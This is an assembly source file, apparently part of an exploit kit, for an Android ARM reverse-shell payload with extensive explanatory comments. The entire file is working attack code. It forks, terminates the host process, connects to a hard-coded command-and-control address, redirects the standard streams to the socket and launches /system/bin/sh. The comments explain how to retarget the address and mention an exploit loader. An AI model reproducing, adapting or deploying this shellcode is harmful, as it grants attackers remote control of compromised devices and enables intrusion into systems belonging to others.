/*
 * Android/ARM reverse-shell payload (GNU as syntax, ARM EABI syscall numbers in r7).
 *
 * Entry is in ARM state; the first two instructions switch to Thumb and the rest
 * of the payload is 16-bit Thumb code. Flow:
 *   1. fork()
 *   2. parent: gettid(), then tkill(tid, SIGTERM) -- the host process that ran
 *      this payload terminates itself (a visible artifact on the target).
 *   3. child: socket(AF_INET, SOCK_STREAM, 0); connect() to the hard-coded
 *      sockaddr_in at the end of this file (10.0.2.2, port 0x1234 = 4660);
 *      dup2() the socket onto fds 2, 1, 0; execve("/system/bin/sh",
 *      ["/system/bin/sh", NULL], NULL).
 *
 * The layout is position-dependent: both `add rN, pc, #imm` instructions are
 * hand-computed offsets to the data block below, so inserting or removing any
 * Thumb instruction between them and the data silently breaks the payload.
 * The offsets (and the `.align 2` padding, which is relative to the absolute
 * address) assume _start itself is 4-byte aligned.
 * NOTE(review): `adr r1, <sockaddr>` / `adr r0, <path>` would let the assembler
 * compute and range-check these offsets; not changed here so the emitted bytes
 * stay identical.
 *
 * No syscall return value is checked: a failed socket()/connect() still falls
 * through to dup2()/execve(). The C2 endpoint is the sockaddr_in data below.
 */
.globl _start
_start:
.code 32
/* ARM state: pc reads as (address of this instruction + 8), i.e. the address
   of the `nop` below; +1 sets the Thumb bit so `bx` switches instruction set. */
add r1, pc, #1
bx r1
.code 16
/* fork */
nop /* Thumb entry point (target of the bx above) */
mov r3, #0
mov r2, #0
mov r1, #0
mov r0, #0
mov r7, #2 /* fork() -- ARM EABI #2; the svc immediate is ignored by Linux, the number is in r7 */
svc 1
cmp r0, #0 /* child is 0 */
beq child
/* parent only: terminate the host process. r0 still holds the tid returned by
   gettid when tkill runs, so it becomes tkill's first argument. */
mov r7, #224 /* gettid */
svc 1
mov r1, #15 /* send sigterm */
mov r7, #238 /* tkill(tid, SIGTERM) -- ARM EABI #238 */
svc 1
/* child only */
child:
mov r0, #2 /* domain = AF_INET */
mov r1, #1 /* type = SOCK_STREAM */
sub r2, r2, r2 /* protocol = 0 */
lsl r7, r1, #8 /* r7 = 256; socket is #281, too large for a Thumb 8-bit immediate */
add r7, r7, #25 /* socket(2, 1, 0) -- r7 = 256 + 25 = 281 */
svc 1
mov r6, r0 /* keep the socket fd in r6; r0 is overwritten by every later syscall */
add r1, pc, #32 /* &sockaddr_in below: Thumb pc = Align(here + 4, 4), +32 reaches the `.short 0x2` */
mov r2, #16 /* addrlen = sizeof(struct sockaddr_in). Only 8 bytes of real fields follow;
               the 8-byte sin_zero tail is the start of the path string, which the kernel ignores */
add r7, #2 /* connect -- ARM EABI #283 */
svc 1 /* connect(r0, &addr, 16) */
mov r7, #63 /* dup2 -- ARM EABI #63 */
mov r1, #2 /* newfd counts down 2, 1, 0 (stderr, stdout, stdin) */
Lb:
mov r0, r6 /* oldfd = socket; reloaded each pass because the syscall clobbers r0 */
svc 1
sub r1, #1 /* two-operand Thumb SUB updates flags for the branch below */
bpl Lb /* dup2(r0, 0/1/2) -- loop while r1 >= 0, exits when r1 becomes -1 */
add r0, pc, #20 /* &"/system/bin/sh" below (same Align(pc + 4, 4) rule as above) */
sub r2, r2, r2 /* envp = NULL */
push {r0, r2} /* argv[] = { path, NULL }: lower-numbered register lands at the lower address */
mov r1, sp /* argv */
mov r7, #11 /* execve -- ARM EABI #11 */
svc 1 /* execve("/system/bin/sh", ["/system/bin/sh", 0], 0) */
.align 2 /* struct sockaddr_in (on ARM, .align 2 means 2^2 = 4-byte alignment) */
.short 0x2 /* sin_family = AF_INET */
.short 0x3412 /* sin_port: stored little-endian as bytes 0x12 0x34 = network-order 0x1234 = 4660 */
.byte 10,0,2,2 /* sin_addr = 10.0.2.2 -- the C2 endpoint; commonly the Android emulator's host alias. Patch here to retarget */
.ascii "/system/bin/sh\0\0" /* 14 chars + 2 NULs = 16 bytes; its first 8 bytes also serve as sin_zero for connect() */
parent_jump: .word 0xa84e5147 /* NOTE(review): referenced by no instruction in this file; presumably a
                                  marker or placeholder patched by the exploit loader -- confirm against the caller */